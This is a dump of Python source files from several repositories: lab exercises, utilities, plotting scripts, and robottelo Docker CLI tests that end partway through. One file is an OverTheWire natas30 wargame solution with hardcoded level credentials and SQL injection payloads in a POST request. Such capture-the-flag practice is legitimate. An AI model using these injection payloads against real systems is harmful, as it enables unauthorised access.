repo_name
stringlengths 5
104
| path
stringlengths 4
248
| content
stringlengths 102
99.9k
|
|---|---|---|
jonobrien/School_Backups
|
cs1-python/Labs/week 9/kebab_spot.py
|
"""
Description: A module that represents "spots" on the skewer.
Author: Sean Strout
Author: James Heliotis
Author: Jon O'Brien
"""
import food
class NoneNode():
"""A class to represent no node"""
__slots__ = ()
"""A global constant for no node"""
NONE_NODE = NoneNode()
class KebabSpot(object):
"""
This class is used to represent an individual
spot on the shish kebab skewer. Each spot contains
1. item - a food item.
2. succ - a reference to the next KebabSpot (or NoneNode).
In computer science terms, a KebabSpot acts like a node in a stack.
"""
__slots__ = (
'item', # The food item (of type Food)
'succ' # The next food item (of type Food, or None)
)
def mkKebabSpot( item, succ ):
"""
Construct a KebabSpot instance.
Arguments:
item - the item (type Food) to store at this spot
succ - the next KebabSpot on the skewer
Returns: New KebabSpot
"""
kebabSpot = KebabSpot()
kebabSpot.item = item
kebabSpot.succ = succ
return kebabSpot
def calories(kebabSpot):
"""
counts the number of calories on the skewer with a while loop. It takes
the parameter of kebabSpot that is used to find the position of the
object on the skewer and counts the calories it receives to accumulate.
"""
calories = 0
currSpot = kebabSpot
while currSpot != NONE_NODE:
calories += int(food.CALORIES[currSpot.item.name])
currSpot = currSpot.succ
return calories
def size(kebabSpot):
"""
Count the number of KebabSpots on the skewer starting
at this one and going to the end.
Idea: If one asks the first KebabSpot on the skewer
for a size, the total number of KebabSpot's (and therefore
food items) is computed.
Arguments:
kebabSpot - the KebabSpot instance
Returns: The number of KebabSpots starting at this one.
"""
#need to go through all the spots to continue through this stuff.
if kebabSpot==NONE_NODE:
return 0
else:
return 1 + size(kebabSpot.succ)
def isVeggie(kebabSpot):
"""
Return whether there are only vegetable foods from this
KebabSpot to the end of the skewer.
Idea: If one asks the first KebabSpot on the skewer
isVeggie, one can find out if the entire shish kebab
is vegetarian.
Arguments:
kebabSpot - the KebabSpot instance
Returns: True if there are no vegetables starting at
this KebabSpot, False otherwise.
"""
if kebabSpot==NONE_NODE:
return True
elif kebabSpot.item.veggie is True:
return isVeggie(kebabSpot.succ)
else:
return False
def has(kebabSpot, name):
"""
Return whether there are any foods of the given kind
from this KebabSpot to the end of the skewer.
Arguments:
kebabSpot - the KebabSpot instance
name - the name (string) being searched for.
Returns: True if any of the spots hold a food
item that equals the name, False otherwise.
"""
while(kebabSpot != NONE_NODE):
if str(kebabSpot.item.name)==str(name):
return True
else:
return has(kebabSpot.succ,name)
return False
def stringEm(kebabSpot):
"""
Return a string that contains the list of names of
items in the skewer from this spot down, with a comma
after each entry.
Arguments:
kebabSpot - the KebabSpot instance
Returns: A string containing the names of each
of the food items from this spot down.
"""
if isinstance(kebabSpot,NoneNode):
return''
elif isinstance(kebabSpot.succ,NoneNode):
return str(kebabSpot.item.name)
else:
return str(kebabSpot.item.name) + ', ' + stringEm(kebabSpot.succ)
def emptyKebab(kebabSpot):
"""Returns whether the kebabSpot is empty or not"""
if kebabSpot==NONE_NODE:
return True
else:
return False
|
lcy2/otwPython
|
natas30/natas30.py
|
import requests
user_auth = ('natas30','wie9iexae0Daihohv8vuu3cei9wahf0e')
target = 'http://natas30.natas.labs.overthewire.org/index.pl'
payload = 'username=natas31&password=2&password=1\' OR 1=1&password=2'
payload2 = 'username=natas31&password=1'
payload3 = "username='natas31' OR '1'='1'&username=3&password='1'"
header = {'Content-Type': 'application/x-www-form-urlencoded'}
response = requests.post(target, auth = user_auth, headers = header, data = payload3.replace(" ", "%20"))
print response.text
|
tuergeist/HackerRank
|
challenges/sock_merchant.py
|
# URL
# https://www.hackerrank.com/challenges/sock-merchant
import unittest
def main():
data = readFromStdin()
print(sock_pairs(data))
def readFromStdin():
_ = int(input().strip())
data = [int(c_temp) for c_temp in input().strip().split(' ')]
return data
def sock_pairs(data):
sdic = {}
pair = 0
for sock in data:
if sock in sdic:
if sdic[sock] == 1:
sdic[sock] = 0
pair +=1
else:
sdic[sock] = 1
else:
sdic[sock] = 1
return pair
if __name__ == "__main__":
# unittest.main()
main()
class Test(unittest.TestCase):
def testABC(self):
self.assertEqual(3, sock_pairs([10,20, 20, 10, 10, 30, 50, 10, 20]))
|
DIRACGrid/DIRAC
|
tests/Performance/MySQLJobMonitoring/test_scripts/query.py
|
"""
Performance test created using multi-mechnize to analyze time
for query processing with MySQL.
"""
import random
import time
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
class Transaction(object):
def __init__(self):
self.JobDB = JobDB()
self.custom_timers = {}
def run(self):
start_time = time.time()
for i in range(0, random.randint(1000, 3000)):
jobID = random.randint(1, 1000)
self.JobDB.getJobParameters(jobID)
end_time = time.time()
self.custom_timers["Execution_Time"] = end_time - start_time
if __name__ == "__main__":
trans = Transaction()
trans.run()
print(trans.custom_timers)
|
andreymal/mini_fiction
|
mini_fiction/downloads/base.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import zipfile
from flask import url_for, render_template
from mini_fiction.utils import misc
class BaseDownloadFormat(object):
extension = None
name = None
content_type = 'application/octet-stream'
debug_content_type = 'text/plain; charset=utf-8'
chapter_template = None
chapter_extension = None
def __init__(self, slugify_filenames=False):
assert self.extension is not None
assert self.name is not None
self.slugify_filenames = bool(slugify_filenames)
def url(self, story):
return url_for(
'story.download',
story_id=story.id,
filename=self.filename(story),
)
def filename(self, story):
title = (story.title or str(story.id)).strip().replace('.', '')
if self.slugify_filenames:
title = slugify(title)
else:
title = misc.sanitize_filename(title, strip=True)
return '{}.{}'.format(title, self.extension)
def render(self, **kw):
raise NotImplementedError
@property
def slug(self):
return slugify(str(self.name.lower()))
class ZipFileDownloadFormat(BaseDownloadFormat):
content_type = 'application/zip'
chapter_encoding = 'utf-8'
def render(self, **kw):
from io import BytesIO
buf = BytesIO()
zipobj = zipfile.ZipFile(buf, mode='w', compression=zipfile.ZIP_DEFLATED)
try:
self.render_zip_contents(zipobj, **kw)
finally:
zipobj.close()
return buf.getvalue()
def render_zip_contents(self, zipobj, story, **kw):
from mini_fiction.models import Chapter
dirname = slugify(story.title or str(story.id))
ext = self.chapter_extension
chapters = list(story.chapters.select(lambda x: not x.draft).order_by(Chapter.order, Chapter.id))
num_width = len(str(max(x.order for x in chapters))) if chapters else 1
for chapter in chapters:
data = render_template(
self.chapter_template,
chapter=chapter,
story=story,
).encode(self.chapter_encoding)
name = slugify(chapter.autotitle)
num = str(chapter.order).rjust(num_width, '0')
arcname = str('%s/%s_%s.%s' % (dirname, num, name, ext))
zipdate = chapter.updated
if chapter.first_published_at and chapter.first_published_at > zipdate:
zipdate = chapter.first_published_at
zipinfo = zipfile.ZipInfo(
arcname,
date_time=zipdate.timetuple()[:6],
)
zipinfo.compress_type = zipfile.ZIP_DEFLATED
zipinfo.external_attr = 0o644 << 16 # Python 3.4 ставит файлам права 000, фиксим
zipobj.writestr(zipinfo, data)
def slugify(s):
from mini_fiction.utils.unidecode import unidecode
return re.subn(r'\W+', '_', unidecode(s))[0]
|
rplevka/robottelo
|
pytest_plugins/markers.py
|
# Custom markers for robottelo tests
def pytest_configure(config):
"""Register custom markers to avoid warnings."""
markers = [
"deselect(reason=None): Mark test to be removed from collection.",
"skip_if_open(issue): Skip test based on issue status.",
"tier1: Tier 1 tests", # CRUD tests
"tier2: Tier 2 tests", # Association tests
"tier3: Tier 3 tests", # Systems integration tests
"tier4: Tier 4 tests", # Long running tests
"destructive: Destructive tests",
"upgrade: Upgrade tests",
"pit_server: PIT server scenario tests",
"pit_client: PIT client scenario tests",
"run_in_one_thread: Sequential tests",
"build_sanity: Fast, basic tests that confirm build is ready for full test suite",
]
markers.extend(module_markers())
for marker in markers:
config.addinivalue_line("markers", marker)
def module_markers():
"""Register custom markers for each module"""
return [
"host_create: Marks host creation CLI tests",
"host_update: Marks host update CLI tests",
"host_parameter: Marks host parameter CLI tests",
"katello_host_tools: Marks host CLI tests where katello host tools is installed on client",
"host_subscription: Marks host subscription CLI tests",
]
|
octoalmawaukh/math-waffle
|
work in progress/## 60 list of probability distributions/imgsrc/pdf_cauchy.py
|
import numpy as np
import scipy.special as sps
import matplotlib.pyplot as plt
from pylab import rcParams
def make_beta(zer, gam):
return lambda x: 1.0 / (np.pi * gam * (1 + (x - zer / gam) ** 2))
def main():
rcParams['figure.figsize'] = 8, 6
# figure(num=None, facecolor='w', edgecolor='k')
ax = plt.figure().add_subplot(1,1,1)
x = np.arange(-5, 5, 0.01)
mus = [0.0, 0.0, 0.0, -2.0]
bet = [0.5, 2.0, 1.0, 1.0]
c = ['b','r','y','g']
for para, parb, color in zip(mus, bet, c):
beta = make_beta(para, parb)(x)
ax.plot(x, beta, color, linewidth=3)
ax.grid(True)
plt.xlim(-5, 5)
plt.ylim(0, 0.7)
# plt.legend(['0.2', '1.0', '5.0', '0.5'], loc='best',prop={'size':20})
plt.savefig('foo.pdf', bbox_inches='tight')
if __name__ == '__main__':
main()
|
Bone-Imaging-ToolKit/BItk
|
bitk/core/rescale.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# title : rescale.py
# description : Normalize data into a defined range/type
# copyright : (c) 2017 I3MTO laboratory. All Rights Reserved
# author(s) : Thomas Janvier
# creation : 01 December 2017
# modification : 17 December 2017
#
# TODO:
# - based on numpy min and max, might speed it up...
import numpy as np
from numba import vectorize
__all__ = ['rescale']
def rescale(data, clip=(0.0, 1.0), cast='float64'):
"""Rescale numerical `data` inside the `clip` range and cast as `type`.
Parameters
----------
data : array_like
Input data.
clip : (scalar, scalar), int or float, optional
[lower, upper] desired boundaries
Returns
-------
data : array_like
rescaled (casted) data
Notes
-----
If boundaries 'lower' > 'upper' then the signal is inverted.
Examples
--------
Rescale [0, 1] random floats to [0, 255] integers:
>>> import numpy
>>> x = numpy.random.rand(9)
>>> rescale(x, (0, 255), 'uint8')
"""
# lazy numpy.ndarray cast
data = np.asarray(data)
# if no conversion asked, store the original type
if not cast:
cast = data.dtype
# use as float to avoid percision-dependant truncation
data.astype('float64')
# parse the desired boundaries as float
lb = float(clip[0])
ub = float(clip[1])
# extract the array min/max values
lv = np.min(data)
uv = np.max(data)
return (data - lv) * (ub - lb) / (uv - lv) + lb
# # rescale
# data = _rescale(data, lb, ub, lv, uv)
# # lazy cast
# return data.astype(cast)
@vectorize(cache=True, nopython=True)
def _rescale(data, lv, uv, lb, ub):
"""Vectorized rescale function.
Parameters
----------
data : array_like
Input data.
lv : int or float
lower value in data
uv : int or float
upper value in data
lb : int or float
lower boundary to fit
ub : int or float
upper boundary to fit
Returns
-------
data : array_like
rescaled (casted) data
"""
return (data - lv) * (ub - lb) / (uv - lv) + lb
|
ocelot-collab/ocelot
|
demos/sr/coherent_rad.py
|
__author__ = 'Sergey Tomin'
import sys
import matplotlib
from ocelot.rad import *
from ocelot.gui import *
from ocelot import *
from ocelot.rad.radiation_py import *
from ocelot.rad.undulator_params import *
import copy
sigma_tau = 100e-6/2.36
tau_p_cor = 0.013/2.36
tau = np.array([-1, 0, 1])*sigma_tau
phi = tau/1.45859E-04*360
font = {'size' : 14}
matplotlib.rc('font', **font)
p_array_init = ParticleArray(n=3)
p_array_init.tau()[:] = np.array([-1, 0, 1])*sigma_tau
p_array_init.p()[:] = tau_p_cor*tau/sigma_tau
p_array_init.E = 0.6
p_array_init.q_array[:] = 1e-10
p_array = copy.deepcopy(p_array_init)
screen = Screen()
screen.z = 1000.0
screen.size_x = 15
screen.size_y = 15
screen.nx = 2000
screen.ny = 1
screen.start_energy = 0.00850
screen.end_energy = 15e-3
screen.num_energy = 1
screen.update()
und = Undulator(lperiod=0.4, nperiods=9, Kx=44.821)
lat = MagneticLattice((und,))
screen = coherent_radiation(lat, screen, p_array, accuracy=2, end_poles=False)
show_flux(screen)
plt.show()
|
jyejare/robottelo
|
tests/foreman/cli/test_docker.py
|
"""Tests for the Docker feature.
:Requirement: Docker
:CaseAutomation: Automated
:CaseLevel: Component
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
from random import choice
from random import randint
import pytest
from fauxfactory import gen_string
from fauxfactory import gen_url
from wait_for import wait_for
from robottelo import ssh
from robottelo.cli.activationkey import ActivationKey
from robottelo.cli.base import CLIReturnCodeError
from robottelo.cli.contentview import ContentView
from robottelo.cli.docker import Docker
from robottelo.cli.factory import make_activation_key
from robottelo.cli.factory import make_content_view
from robottelo.cli.factory import make_lifecycle_environment
from robottelo.cli.factory import make_product_wait
from robottelo.cli.factory import make_repository
from robottelo.cli.lifecycleenvironment import LifecycleEnvironment
from robottelo.cli.product import Product
from robottelo.cli.repository import Repository
from robottelo.config import settings
from robottelo.constants import CONTAINER_REGISTRY_HUB
from robottelo.constants import CONTAINER_RH_REGISTRY_UPSTREAM_NAME
from robottelo.constants import CONTAINER_UPSTREAM_NAME
from robottelo.constants import REPO_TYPE
from robottelo.datafactory import invalid_docker_upstream_names
from robottelo.datafactory import parametrized
from robottelo.datafactory import valid_docker_repository_names
from robottelo.datafactory import valid_docker_upstream_names
from robottelo.logging import logger
def _repo(product_id, name=None, upstream_name=None, url=None):
"""Creates a Docker-based repository.
:param product_id: ID of the ``Product``.
:param str name: Name for the repository. If ``None`` then a random
value will be generated.
:param str upstream_name: A valid name of an existing upstream repository.
If ``None`` then defaults to CONTAINER_UPSTREAM_NAME constant.
:param str url: URL of repository. If ``None`` then defaults to
CONTAINER_REGISTRY_HUB constant.
:return: A ``Repository`` object.
"""
return make_repository(
{
'content-type': REPO_TYPE['docker'],
'docker-upstream-name': upstream_name or CONTAINER_UPSTREAM_NAME,
'name': name or gen_string('alpha', 5),
'product-id': product_id,
'url': url or CONTAINER_REGISTRY_HUB,
}
)
def _content_view(repo_id, org_id):
"""Create a content view and link it to the given repository."""
content_view = make_content_view({'composite': False, 'organization-id': org_id})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo_id})
return ContentView.info({'id': content_view['id']})
@pytest.fixture
def docker_host(rhel7_contenthost):
"""Instantiate and set up a docker host VM. Destroy VM when done."""
logger.info('Installing katello-ca on the external docker host')
rhel7_contenthost.install_katello_ca()
repos = {
'server': settings.repos.rhel7_os,
'optional': settings.repos.rhel7_optional,
'extras': settings.repos.rhel7_extras,
}
rhel7_contenthost.create_custom_repos(**repos)
rhel7_contenthost.execute('yum -y install docker')
rhel7_contenthost.execute('systemctl start docker')
return rhel7_contenthost
@pytest.fixture
def repo(module_product):
return _repo(module_product.id)
@pytest.fixture
def content_view(module_org, repo):
return _content_view(repo['id'], module_org.id)
@pytest.fixture
def content_view_publish(content_view):
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
return ContentView.version_info({'id': content_view['versions'][0]['id']})
@pytest.fixture
def content_view_promote(content_view_publish, module_lce):
ContentView.version_promote(
{
'id': content_view_publish['id'],
'to-lifecycle-environment-id': module_lce.id,
}
)
return ContentView.version_info({'id': content_view_publish['id']})
class TestDockerManifest:
"""Tests related to docker manifest command
:CaseComponent: Repositories
:Assignee: chiggins
"""
@pytest.mark.tier2
def test_positive_read_docker_tags(self, repo):
"""docker manifest displays tags information for a docker manifest
:id: 59b605b5-ac2d-46e3-a85e-a259e78a07a8
:expectedresults: docker manifest displays tags info for a docker
manifest
:CaseImportance: Medium
:BZ: 1658274
"""
Repository.synchronize({'id': repo['id']})
# Grab all available manifests related to repository
manifests_list = Docker.manifest.list({'repository-id': repo['id']})
# Some manifests do not have tags associated with it, ignore those
# because we want to check the tag information
manifests = [m_iter for m_iter in manifests_list if not m_iter['tags'] == '']
assert manifests
tags_list = Docker.tag.list({'repository-id': repo['id']})
# Extract tag names for the repository out of docker tag list
repo_tag_names = [tag['tag'] for tag in tags_list]
for manifest in manifests:
manifest_info = Docker.manifest.info({'id': manifest['id']})
# Check that manifest's tag is listed in tags for the repository
for t_iter in manifest_info['tags']:
assert t_iter['name'] in repo_tag_names
class TestDockerRepository:
"""Tests specific to performing CRUD methods against ``Docker`` repositories.
:CaseComponent: Repositories
:Assignee: chiggins
"""
@pytest.mark.tier1
@pytest.mark.parametrize('name', **parametrized(valid_docker_repository_names()))
def test_positive_create_with_name(self, module_org, module_product, name):
"""Create one Docker-type repository
:id: e82a36c8-3265-4c10-bafe-c7e07db3be78
:parametrized: yes
:expectedresults: A repository is created with a Docker upstream
repository.
:CaseImportance: Critical
"""
repo = _repo(module_product.id, name)
assert repo['name'] == name
assert repo['upstream-repository-name'] == CONTAINER_UPSTREAM_NAME
assert repo['content-type'] == REPO_TYPE['docker']
@pytest.mark.tier2
def test_positive_create_repos_using_same_product(self, module_org, module_product):
"""Create multiple Docker-type repositories
:id: 6dd25cf4-f8b6-4958-976a-c116daf27b44
:expectedresults: Multiple docker repositories are created with a
Docker upstream repository and they all belong to the same product.
:CaseLevel: Integration
"""
repo_names = set()
for _ in range(randint(2, 5)):
repo = _repo(module_product.id)
repo_names.add(repo['name'])
product = Product.info({'id': module_product.id, 'organization-id': module_org.id})
assert repo_names.issubset({repo_['repo-name'] for repo_ in product['content']})
@pytest.mark.tier2
def test_positive_create_repos_using_multiple_products(self, module_org):
"""Create multiple Docker-type repositories on multiple
products.
:id: 43f4ab0d-731e-444e-9014-d663ff945f36
:expectedresults: Multiple docker repositories are created with a
Docker upstream repository and they all belong to their respective
products.
:CaseLevel: Integration
"""
for _ in range(randint(2, 5)):
product = make_product_wait({'organization-id': module_org.id})
repo_names = set()
for _ in range(randint(2, 3)):
repo = _repo(product['id'])
repo_names.add(repo['name'])
product = Product.info({'id': product['id'], 'organization-id': module_org.id})
assert repo_names == {repo_['repo-name'] for repo_ in product['content']}
@pytest.mark.tier1
def test_positive_sync(self, repo):
"""Create and sync a Docker-type repository
:id: bff1d40e-181b-48b2-8141-8c86e0db62a2
:expectedresults: A repository is created with a Docker repository and
it is synchronized.
:CaseImportance: Critical
"""
assert int(repo['content-counts']['container-image-manifests']) == 0
Repository.synchronize({'id': repo['id']})
repo = Repository.info({'id': repo['id']})
assert int(repo['content-counts']['container-image-manifests']) > 0
@pytest.mark.tier1
@pytest.mark.parametrize('new_name', **parametrized(valid_docker_repository_names()))
def test_positive_update_name(self, repo, new_name):
"""Create a Docker-type repository and update its name.
:id: 8b3a8496-e9bd-44f1-916f-6763a76b9b1b
:parametrized: yes
:expectedresults: A repository is created with a Docker upstream
repository and that its name can be updated.
:CaseImportance: Critical
"""
Repository.update({'id': repo['id'], 'new-name': new_name, 'url': repo['url']})
repo = Repository.info({'id': repo['id']})
assert repo['name'] == new_name
@pytest.mark.tier1
@pytest.mark.parametrize('new_upstream_name', **parametrized(valid_docker_upstream_names()))
def test_positive_update_upstream_name(self, repo, new_upstream_name):
"""Create a Docker-type repository and update its upstream name.
:id: 1a6985ed-43ec-4ea6-ba27-e3870457ac56
:parametrized: yes
:expectedresults: A repository is created with a Docker upstream
repository and that its upstream name can be updated.
:CaseImportance: Critical
"""
Repository.update(
{
'docker-upstream-name': new_upstream_name,
'id': repo['id'],
'url': repo['url'],
}
)
repo = Repository.info({'id': repo['id']})
assert repo['upstream-repository-name'] == new_upstream_name
@pytest.mark.tier1
@pytest.mark.parametrize('new_upstream_name', **parametrized(invalid_docker_upstream_names()))
def test_negative_update_upstream_name(self, repo, new_upstream_name):
"""Attempt to update upstream name for a Docker-type repository.
:id: 798651af-28b2-4907-b3a7-7c560bf66c7c
:parametrized: yes
:expectedresults: A repository is created with a Docker upstream
repository and that its upstream name can not be updated with
invalid values.
:CaseImportance: Critical
"""
with pytest.raises(CLIReturnCodeError, match='Validation failed: Docker upstream name'):
Repository.update(
{
'docker-upstream-name': new_upstream_name,
'id': repo['id'],
'url': repo['url'],
}
)
@pytest.mark.skip_if_not_set('docker')
@pytest.mark.tier1
def test_positive_create_with_long_upstream_name(self, module_product):
"""Create a docker repository with upstream name longer than 30
characters
:id: 4fe47c02-a8bd-4630-9102-189a9d268b83
:customerscenario: true
:BZ: 1424689
:expectedresults: docker repository is successfully created
:CaseImportance: Critical
"""
repo = _repo(
module_product.id,
upstream_name=CONTAINER_RH_REGISTRY_UPSTREAM_NAME,
url=settings.docker.external_registry_1,
)
assert repo['upstream-repository-name'] == CONTAINER_RH_REGISTRY_UPSTREAM_NAME
@pytest.mark.skip_if_not_set('docker')
@pytest.mark.tier1
def test_positive_update_with_long_upstream_name(self, repo):
"""Create a docker repository and update its upstream name with longer
than 30 characters value
:id: 97260cce-9677-4a3e-942b-e95e2714500a
:BZ: 1424689
:expectedresults: docker repository is successfully updated
:CaseImportance: Critical
"""
Repository.update(
{
'docker-upstream-name': CONTAINER_RH_REGISTRY_UPSTREAM_NAME,
'id': repo['id'],
'url': settings.docker.external_registry_1,
}
)
repo = Repository.info({'id': repo['id']})
assert repo['upstream-repository-name'] == CONTAINER_RH_REGISTRY_UPSTREAM_NAME
@pytest.mark.tier2
def test_positive_update_url(self, repo):
"""Create a Docker-type repository and update its URL.
:id: 73caacd4-7f17-42a7-8d93-3dee8b9341fa
:expectedresults: A repository is created with a Docker upstream
repository and that its URL can be updated.
"""
new_url = gen_url()
Repository.update({'id': repo['id'], 'url': new_url})
repo = Repository.info({'id': repo['id']})
assert repo['url'] == new_url
@pytest.mark.tier1
def test_positive_delete_by_id(self, repo):
"""Create and delete a Docker-type repository
:id: ab1e8228-92a8-45dc-a863-7181711f2745
:expectedresults: A repository with a upstream repository is created
and then deleted.
:CaseImportance: Critical
"""
Repository.delete({'id': repo['id']})
with pytest.raises(CLIReturnCodeError):
Repository.info({'id': repo['id']})
@pytest.mark.tier2
def test_positive_delete_random_repo_by_id(self, module_org):
"""Create Docker-type repositories on multiple products and
delete a random repository from a random product.
:id: d4db5eaa-7379-4788-9b72-76f2589d8f20
:expectedresults: Random repository can be deleted from random product
without altering the other products.
"""
products = [
make_product_wait({'organization-id': module_org.id}) for _ in range(randint(2, 5))
]
repos = []
for product in products:
for _ in range(randint(2, 3)):
repos.append(_repo(product['id']))
# Select random repository and delete it
repo = choice(repos)
repos.remove(repo)
Repository.delete({'id': repo['id']})
with pytest.raises(CLIReturnCodeError):
Repository.info({'id': repo['id']})
# Verify other repositories were not touched
product_ids = [product['id'] for product in products]
for repo in repos:
result = Repository.info({'id': repo['id']})
assert result['product']['id'] in product_ids
class TestDockerContentView:
"""Tests specific to using ``Docker`` repositories with Content Views.
:CaseComponent: ContentViews
:Assignee: ltran
:CaseLevel: Integration
"""
@pytest.mark.tier2
def test_positive_add_docker_repo_by_id(self, module_org, repo):
"""Add one Docker-type repository to a non-composite content view
:id: 87d6c7bb-92f8-4a32-8ad2-2a1af896500b
:expectedresults: A repository is created with a Docker repository and
the product is added to a non-composite content view
"""
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
content_view = ContentView.info({'id': content_view['id']})
assert repo['id'] in [repo_['id'] for repo_ in content_view['container-image-repositories']]
@pytest.mark.tier2
def test_positive_add_docker_repos_by_id(self, module_org, module_product):
"""Add multiple Docker-type repositories to a non-composite CV.
:id: 2eb19e28-a633-4c21-9469-75a686c83b34
:expectedresults: Repositories are created with Docker upstream
repositories and the product is added to a non-composite content
view.
"""
repos = [_repo(module_product.id) for _ in range(randint(2, 5))]
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
for repo in repos:
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
content_view = ContentView.info({'id': content_view['id']})
assert {repo['id'] for repo in repos} == {
repo['id'] for repo in content_view['container-image-repositories']
}
@pytest.mark.tier2
def test_positive_add_synced_docker_repo_by_id(self, module_org, repo):
"""Create and sync a Docker-type repository
:id: 6f51d268-ed23-48ab-9dea-cd3571daa647
:expectedresults: A repository is created with a Docker repository and
it is synchronized.
"""
Repository.synchronize({'id': repo['id']})
repo = Repository.info({'id': repo['id']})
assert int(repo['content-counts']['container-image-manifests']) > 0
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
content_view = ContentView.info({'id': content_view['id']})
assert repo['id'] in [repo_['id'] for repo_ in content_view['container-image-repositories']]
@pytest.mark.tier2
def test_positive_add_docker_repo_by_id_to_ccv(self, module_org, content_view):
"""Add one Docker-type repository to a composite content view
:id: 8e2ef5ba-3cdf-4ef9-a22a-f1701e20a5d5
:expectedresults: A repository is created with a Docker repository and
the product is added to a content view which is then added to a
composite content view.
:BZ: 1359665
"""
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == 1
comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
ContentView.update(
{
'id': comp_content_view['id'],
'component-ids': content_view['versions'][0]['id'],
}
)
comp_content_view = ContentView.info({'id': comp_content_view['id']})
assert content_view['versions'][0]['id'] in [
component['id'] for component in comp_content_view['components']
]
@pytest.mark.tier2
def test_positive_add_docker_repos_by_id_to_ccv(self, module_org, module_product):
"""Add multiple Docker-type repositories to a composite content view.
:id: b79cbc97-3dba-4059-907d-19316684d569
:expectedresults: One repository is created with a Docker upstream
repository and the product is added to a random number of content
views which are then added to a composite content view.
:BZ: 1359665
"""
cv_versions = []
for _ in range(randint(2, 5)):
content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
repo = _repo(module_product.id)
ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == 1
cv_versions.append(content_view['versions'][0])
comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
ContentView.update(
{
'component-ids': [cv_version['id'] for cv_version in cv_versions],
'id': comp_content_view['id'],
}
)
comp_content_view = ContentView.info({'id': comp_content_view['id']})
comp_ids = [component['id'] for component in comp_content_view['components']]
for cv_version in cv_versions:
assert cv_version['id'] in comp_ids
@pytest.mark.tier2
def test_positive_publish_with_docker_repo(self, content_view):
"""Add Docker-type repository to content view and publish it once.
:id: 28480de3-ffb5-4b8e-8174-fffffeef6af4
:expectedresults: One repository is created with a Docker upstream
repository and the product is added to a content view which is then
published only once.
"""
assert len(content_view['versions']) == 0
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == 1
@pytest.mark.tier2
def test_positive_publish_with_docker_repo_composite(self, content_view, module_org):
"""Add Docker-type repository to composite CV and publish it once.
:id: 2d75419b-73ed-4f29-ae0d-9af8d9624c87
:expectedresults: One repository is created with a Docker upstream
repository and the product is added to a content view which is then
published once and added to a composite content view which is also
published once.
:BZ: 1359665
"""
assert len(content_view['versions']) == 0
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == 1
comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
ContentView.update(
{
'component-ids': content_view['versions'][0]['id'],
'id': comp_content_view['id'],
}
)
comp_content_view = ContentView.info({'id': comp_content_view['id']})
assert content_view['versions'][0]['id'] in [
component['id'] for component in comp_content_view['components']
]
ContentView.publish({'id': comp_content_view['id']})
comp_content_view = ContentView.info({'id': comp_content_view['id']})
assert len(comp_content_view['versions']) == 1
@pytest.mark.tier2
def test_positive_publish_multiple_with_docker_repo(self, content_view):
"""Add Docker-type repository to content view and publish it multiple
times.
:id: 33c1b2ee-ae8a-4a7e-8254-123d97aaaa58
:expectedresults: One repository is created with a Docker upstream
repository and the product is added to a content view which is then
published multiple times.
"""
assert len(content_view['versions']) == 0
publish_amount = randint(2, 5)
for _ in range(publish_amount):
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == publish_amount
@pytest.mark.tier2
def test_positive_publish_multiple_with_docker_repo_composite(self, module_org, content_view):
"""Add Docker-type repository to content view and publish it multiple
times.
:id: 014adf90-d399-4a99-badb-76ee03a2c350
:expectedresults: One repository is created with a Docker upstream
repository and the product is added to a content view which is then
added to a composite content view which is then published multiple
times.
:BZ: 1359665
"""
assert len(content_view['versions']) == 0
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == 1
comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
ContentView.update(
{
'component-ids': content_view['versions'][0]['id'],
'id': comp_content_view['id'],
}
)
comp_content_view = ContentView.info({'id': comp_content_view['id']})
assert content_view['versions'][0]['id'] in [
component['id'] for component in comp_content_view['components']
]
publish_amount = randint(2, 5)
for _ in range(publish_amount):
ContentView.publish({'id': comp_content_view['id']})
comp_content_view = ContentView.info({'id': comp_content_view['id']})
assert len(comp_content_view['versions']) == publish_amount
@pytest.mark.tier2
def test_positive_promote_with_docker_repo(self, module_org, module_lce, content_view):
"""Add Docker-type repository to content view and publish it.
Then promote it to the next available lifecycle-environment.
:id: a7df98f4-0ec0-40f6-8941-3dbb776d47b9
:expectedresults: Docker-type repository is promoted to content view
found in the specific lifecycle-environment.
"""
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == 1
cvv = ContentView.version_info({'id': content_view['versions'][0]['id']})
assert len(cvv['lifecycle-environments']) == 1
ContentView.version_promote({'id': cvv['id'], 'to-lifecycle-environment-id': module_lce.id})
cvv = ContentView.version_info({'id': content_view['versions'][0]['id']})
assert len(cvv['lifecycle-environments']) == 2
@pytest.mark.tier2
@pytest.mark.upgrade
def test_positive_promote_multiple_with_docker_repo(self, module_org, content_view):
"""Add Docker-type repository to content view and publish it.
Then promote it to multiple available lifecycle-environments.
:id: e9432bc4-a709-44d7-8e1d-00ca466aa32d
:expectedresults: Docker-type repository is promoted to content view
found in the specific lifecycle-environments.
"""
ContentView.publish({'id': content_view['id']})
content_view = ContentView.info({'id': content_view['id']})
assert len(content_view['versions']) == 1
